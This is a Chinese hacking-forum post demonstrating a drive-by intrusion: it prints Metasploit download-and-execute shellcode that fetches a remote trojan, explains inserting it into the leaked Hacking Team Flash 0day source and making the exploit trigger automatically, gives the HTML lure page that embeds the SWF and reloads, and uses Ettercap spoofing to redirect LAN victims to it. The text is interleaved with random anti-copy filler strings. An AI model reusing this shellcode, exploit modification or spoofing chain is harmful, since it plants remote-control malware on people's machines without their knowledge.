找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1381|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; W8 u0 Y7 O2 X% a8 d8 @ 三、flash 0day之手工代码修改制作下载者实例入侵演示 2 a, Y* }: u7 j6 \% k, o& \! {

; n: [: c9 [5 X% {5 C

* d# s# u4 s' N" g 利用到的工具: $ j* c) \! K+ ?5 }4 D

, k- o4 G4 B4 ?; @' N1 v8 s

% E' w3 N Z, N9 i/ x# ? Msf # d1 x" F" T1 X: T4 T2 v9 e& v

7 i* p( O; K* [0 H9 a# P- o

/ u* D& s; A% | t Ettercap 1 p* B/ v' e) E, G! B0 q

; |4 Y8 G9 ]) A( U

' r, y; i a* p Adobe Flash CS6 / }% D, L/ K+ p

: L! C" J4 F6 N9 K' C8 Y2 Q p

% {$ a6 ]' ^3 ]1 O* P/ o4 H Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 $ u6 O. o/ i/ m( j& n7 d- `: R5 a

|: }% I& ^! I } O* v

1 V+ ~4 e/ C6 j& m 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options $ h4 L4 f7 F% W8 x* F) M

' ~% H' V1 H8 F

& G: Q6 D. X' B: L7 f U% B2 Y* d 如图: ( G" m t4 }, z' ^% J3 o n; y2 Y1 e

! e- o0 F% N% I) L& Z* H

7 w) ^/ [+ y) p$ H   : j8 E$ P3 W/ H1 x

4 H5 G! N, U# L

8 f J% m# N8 S" `/ ?# u% h f! `   0 n2 s& d6 P( O- k( |, O! A5 t

8 [" l2 L5 I! G& a8 T

5 U% z8 b8 t" x b& _5 [ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 0 a a( p, S6 f3 X8 T, g

4 y# o; V9 G* H% Y

2 \* o$ ^ }# w% ~2 Y   ( G5 b2 g! Q6 }: d8 X2 e! e

8 ~4 Y( y. |1 a

% R, K/ {' u6 c   " I4 \2 C8 }7 a' D2 b

& B+ Y7 E1 z0 S7 f; @, @

% G, w ?8 z% O& v 然后执行generate -t dword生成shellcode,如下: * {( k: N9 F: s& T

9 [% l! G* L, F: v

8 a) }* h" @+ D9 }   8 c# q% d9 P" ~! q. F

$ v- `# Q( f O* X: J) V1 G

! q0 C3 N- K- E: m& e4 y/ x 复制代码到文本下便于我们一会编辑flash exp,如下: 5 l2 s" j% h. q: k. i- `3 {

) o# s8 y6 I; ?7 I

8 O% n) z+ ~/ @+ l) H8 r$ ^ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, & P2 I* N5 q' \- Y

* C0 k" T3 _( j0 P2 {3 _% d1 b

7 U( A4 ]+ x+ R3 d+ B* c+ y' J$ C 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, : w/ e: W0 B1 j3 a4 [

8 p: A6 `+ ^5 q/ d# |" m6 r. {

+ S' U# a4 I5 D% A 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, * W" a& o T8 k1 K3 S0 T

* O8 | X/ ?) z( X( G o5 L2 n

% e) R) O; N8 l. ^/ i4 a 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, r2 e+ a0 i& @3 r! a' O- L) }

8 C9 N& Q B1 m- ?* H* r. L

' X E! q0 |. `$ X' E3 W! K 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, : G9 H+ ~( G1 C2 W" W% W+ @

0 \4 R0 O) h# V# [3 ?: J9 Y

- H* ?% _! p* _/ l 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, / {1 j- }) i0 N) I5 ?* ]5 a

! u0 V3 l7 {$ Q( _1 B4 G: J

2 u& j' n7 _& J4 n! k( S 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, + S' l; V# c- S% M8 {0 n8 V7 [$ l

{8 V8 G* W5 E

( s' B {) W$ T; _ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, - Z: q4 `. `7 g8 t1 g

0 C: Q2 ]: _& k1 m1 ~

5 y2 b$ L; x5 [! V3 G 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 5 X0 X, \7 W* K$ Y- o0 d c

$ r: v. m) s2 {0 g, h, t M

0 c/ h1 w5 h& z7 r J* n 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 9 n t" K, n, q. a" Z* Y

: f7 P+ y, V9 \) _( }, M/ g

' W, k f1 }2 e" `2 w# T; P 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, * A5 b7 g$ |8 P; }9 ^

( K( B6 [) ^: h; _$ D. t

9 E( ?/ c1 b. G( k/ w& m3 { 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 1 S2 H- E! F3 O% C- M

) ^" a% L c9 X$ D4 Y

& V0 m( [ e) z8 L* q 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - S( S& |5 s- N' g' a' E

7 Z5 r1 ^7 h' \2 q) J b" ^

5 b8 S7 Z( q. [4 f5 d1 c i6 i 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ) F+ |/ ]+ m: [: M! J6 D

% O" z% W7 ~$ w3 k

+ `8 i. [; @' _9 M% V* O7 h9 v6 L   6 ~2 D, Q; \+ k+ ?5 q) r

: l, ?9 L& m- w

% T O7 n* A+ l, w   9 Q7 t; K+ x$ Y% P5 d

8 P5 W! _# f0 p( L% m5 A

: q1 L3 c4 r4 r" w; L4 m 下面我们来修改flash 0day exp,需要修改三个文件,分别为: , [- r _" O0 O! r( R

- r/ k4 K2 e5 E3 ^

, E' N n+ A* K' `6 P9 Y   ( m4 E" W% S8 V1 ~* |

. u" l9 y6 C- p# h3 S& }7 C& ]

' A; s6 n& i1 D) G, I 先修改ShellWin32.as,部分源代码如图: 7 z L8 j, d; X

+ {2 y* ~" u- L6 k% Y" V

( F0 ?2 {* u! A+ ?   5 g. ]& O6 V; \4 b c0 J

* k3 \) Q0 \1 p3 W# X% K+ H

$ o5 B4 F% f# [) X! H3 W* j 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 H8 J1 ]5 g0 q- M- x; ^: u. l

! H! {7 Z* k$ Q* L

: Z5 Y4 q3 S0 m   8 h3 n) {. y* k3 V/ c7 H

7 F2 Z" V0 ~6 E6 a, ?; k& n

6 N# g% N- S8 r, @ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: $ Y+ c3 S- l/ J0 l1 F4 v& l

. z; n: N! l& P/ J: ^6 s

+ K8 O) Q8 ?/ n5 |   , ^# P- I3 o% x$ J6 R/ u7 s1 @! A

% F% L% l6 J4 _1 l+ Z1 f

$ _/ Q9 z" i% S. Q7 p+ D! _ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: , Q: c$ g% m1 Z( A, Z

6 K- m0 f$ A7 T2 O

9 i# z0 d; E: R! G) M   , e% R1 ~4 |( V4 `3 v9 M8 b9 N% O. J

% t: n% G1 y* |! l! @5 N

- u3 d5 i/ M) ?7 B) R   % o1 [, l7 G: H( U6 ^3 e

9 f9 m4 I e( u; G

2 W F, y, ?; N; X& w u; f   % t' k3 y- g6 z* m

2 g3 y t5 M5 J" u2 G9 P9 e% Y' j

& m+ E2 } w. Q 然后点保存,下面我们来编译一下,打开 2 \. G' o% i- @' O

. J, k$ G! b0 v( f; k

6 y+ p) K* S9 I, @3 Z1 p5 m exp1.fla然后点文件-发布,看看编译没错误 ( F5 X4 J9 l, k

8 K1 G5 C* ?1 [& Z

" l. j% M2 ^! ?6 J+ h   * o/ ~& K) t( W

/ S) X v/ g; k/ u) J

+ B+ g( _. Z* E$ X4 R   - v8 g0 o" w1 E

' O) J2 z ~0 S8 U" g0 E% t9 h4 J

3 W8 d9 X' i1 K/ k( @   ( n, @5 O- z, X

6 X. g: [& `; X% }& B7 Q8 A

; J/ @3 e) Z1 a w   : U- _1 v9 j3 P

, F9 i; U3 _5 @0 k# L

1 p! p: f. W; O 然后我们把生成的 7 s$ P m: E7 |6 A$ w1 p2 b7 D; G

" m2 b, L* N& ]

g! v9 J+ C2 W4 m7 Q exp1.swf丢到kailinux /var/www/html下: L: ^- \5 y. G7 h

+ g$ }8 y- ?" h; b5 l3 M5 y" T* N5 r

; | ]' V0 L! I% w& \: [ 然后把这段代码好好编辑一下 3 ~/ f. N% L3 F, o8 C: a5 k7 g

* H# Q7 |& q: H: c9 E2 E# v+ y

1 B4 h: P3 }9 E* V1 B+ C) n. ?   + I) Q+ j% F* A7 b' A8 i( D* W( X3 N

/ d x7 n! i$ v

0 {& p/ Y" Q# I; j7 a   - ^1 B3 S7 a1 Q9 ]- Z" _' B

( t* }$ G$ Y% N6 K/ y6 g: A$ m

% v/ j8 ], F# f, {   ; B9 j* D+ t2 R& ?! Q/ P

8 Y! l7 x# l, Y6 B6 B& t

+ P. E% s2 A8 w, r# C3 W   4 y* s& M; T/ } y$ ]* N

5 {+ C R R/ Q5 i

! }+ T- Q- s5 |5 @7 t   5 _% M: U$ E0 V* d, C0 V

Q% p3 s$ S& ]

# \1 G: C# |8 @' x" |, y   6 y, O2 C8 f& n/ I8 F* k( T

3 n1 G% u. l* H& Q. X

$ Z) u7 I" `6 n! j- E" e* ` <!DOCTYPE html> a8 r6 R: q$ ~: J! k9 Q" G2 z' z

$ G6 r' a8 v5 y+ l! ^* y2 |

# O* S0 m; }( ^0 g/ G, [2 Z <html> " M E+ v! [; g" a2 U" c5 C, j0 J

}. Q+ b+ {7 s! Y! U

% p* l4 J( d- K B <head> 5 e. j0 T6 \- g) a( t* c) `* F

, b8 E& E9 K j# A* R

8 R; _9 J D$ z <meta http-equiv="Content-Type" content="text/html; 1 n2 M6 y4 y7 K9 W+ P6 r$ p

* }( t1 N+ F8 H# B1 v

& X" T7 v" ?( Y; M' E charset=utf-8"/> + D0 o, O: g/ n5 ^/ m: |* I5 {$ Y

S# @1 s: s: o

* N0 i8 O( ]! c) g+ P, y2 f7 B </head> 1 V1 F2 k$ J: D+ n. m ], D: u

* E: b* B0 ~& Q/ O! l

" }6 n6 H( T- n* m0 T8 @/ d! F <body> # H) u1 @, r& c9 n

' J+ r! R3 H5 N$ h2 t, o0 M

; e. n6 ~7 i7 M' J- i6 } <h2> Please wait, the requested page is loading...</h2> " u. x8 o$ V) H7 c; S2 W: d

, [* d5 x# ^3 J6 H( U4 ` N, }! [

; V6 ]+ W" C! ^+ w4 c) o( y <br> , a3 {$ E6 ]8 {& h/ M0 L

, c, p$ A$ Z; q) _" C

4 d3 S8 U5 g; o* u2 { <OBJECT ' D2 ?7 l7 B$ |' E

+ M& U/ v+ q3 V% u! M1 [4 g" M

' c* }' E" u2 C0 S! ~8 l& j, q& s classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 9 q4 b. K* Z1 _5 Y

6 u0 Y' Q) \5 Z- A9 X r# S

- A. _ Q7 M- }9 V VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 ^0 w6 F! q/ q1 T

+ k) X" B& P' d0 g. i" `5 w+ l

9 d1 y+ Q2 E8 z2 O </body> 0 ~$ o7 k2 P0 ?. ]$ P0 K

' d* q" E" }% ~

+ K6 u5 ?6 _& l$ T- Y: v <script> 6 {0 p) a( R1 Y4 {

# K [) _" ^; \6 \/ P4 |

" c- z9 M6 h! c$ [9 ]- f3 x     setTimeout(function () { 8 D* `6 U$ K$ n9 u. G. [4 G

7 \1 D8 I- R c# o& {! p0 i

( ]! u9 r4 ?7 r3 o5 _0 f3 V a          + [. g/ d, ~3 u- F3 q7 ^5 g

/ |! _: p9 S' l J* V0 f& \

0 n. N* p, @6 N: D( F7 w8 b: K window.location.reload(); & v4 \& b% o9 n' D* G" r

; i6 F! a9 s# c( B) @

5 n$ o4 g& x" \' F- C     }, 10000); 7 l8 e, V: h1 U, d3 B- u$ @. l

! f+ K* K4 C+ X% q$ I

6 z& B" p: r7 Z0 d) V6 b3 \" z   # D$ j% s2 Q) p" L3 h, s7 Z7 J. B

3 W7 n5 S% y9 J3 m

& G4 o9 [% x% o! ]9 i </script> ) N1 c n' o3 R/ C- W3 {8 S/ ^. j I

/ ]1 y9 j9 g* z$ }. N- a7 W) H

% b* c0 S+ k3 d5 Q; b </html> 0 o* L$ ?1 Y' J0 K, w5 U. j) ^& g

- R+ c1 Q7 h9 X0 d2 d/ i

; R$ M" z# O* `% n% K) i( d0 i7 z! l   6 j! a; _7 l( }

, _6 ?2 g, T7 i" C4 l& z7 v

7 F* V3 g$ l3 r, C 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: * L. \8 U$ G9 A' H

) ~; ]/ D3 d. ^

0 n( a6 @! S$ m7 n   : Q% v2 i' A7 s' {. k" `+ T& x- P, q

1 T# _: `' O9 G6 t; U2 U

0 g! O" b3 K% ]. Q. p/ a4 T5 }1 S/ k, |   - S$ I1 t! J. I D+ t

- `: A2 d7 w( i' S% v3 v2 @

4 `, _% G5 n, ]   ( N4 Z. F0 f% R

5 s2 D. Z9 J, y! K. [* ~

) J7 Z# X7 L2 O: ~& t8 Q   x- \2 y, n2 {6 a. c

# u8 T' p& E; B7 Y @( M$ o; v1 H

9 S% M1 e$ j h1 N& [( @   / Y7 b7 @* w$ \+ p% {) g

4 ?: O, |1 T' `8 g

1 j3 p" Z; |8 r( V$ W# {! u 下面我们用ettercap欺骗如图: 3 C& N3 k" @% p8 i0 m0 u! O

+ N! F2 A! a" ]& T4 j! k' ]9 N

- X+ U$ s( B/ a1 q- E2 e   0 E1 B; g( u4 ~; g2 T, d3 R

( g9 n5 T e m6 s

3 M. Q v- y& Z C   7 e9 v* K B1 ]- E3 t- V

. _: D C; G4 y9 [& r6 W/ ]

$ k; n/ q9 x h 下面我们随便访问个网站看看: / g- S* l$ O B9 O: i

f% {% P' B! }2 d

F+ k/ o- Z3 i7 ~* j) Z) d: @2 j 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ) v2 v6 o& H Z5 N1 U5 k: E$ h8 w

) z" ?6 [! t$ O

6 {8 u3 Z! D, [7 m& ^, Z   $ y y* c s8 J: n* v" M

& S1 S* _9 K/ Q z" _/ a2 N

0 e# m! ~3 a# }3 v4 z" p 我们看另一台, 4 {$ h$ G: D. w+ G) `

l% f3 s; S( I ^7 P5 H) o9 j

- m3 t2 q( Y& \5 }! v* q 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 " z2 I3 E6 ^" z

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表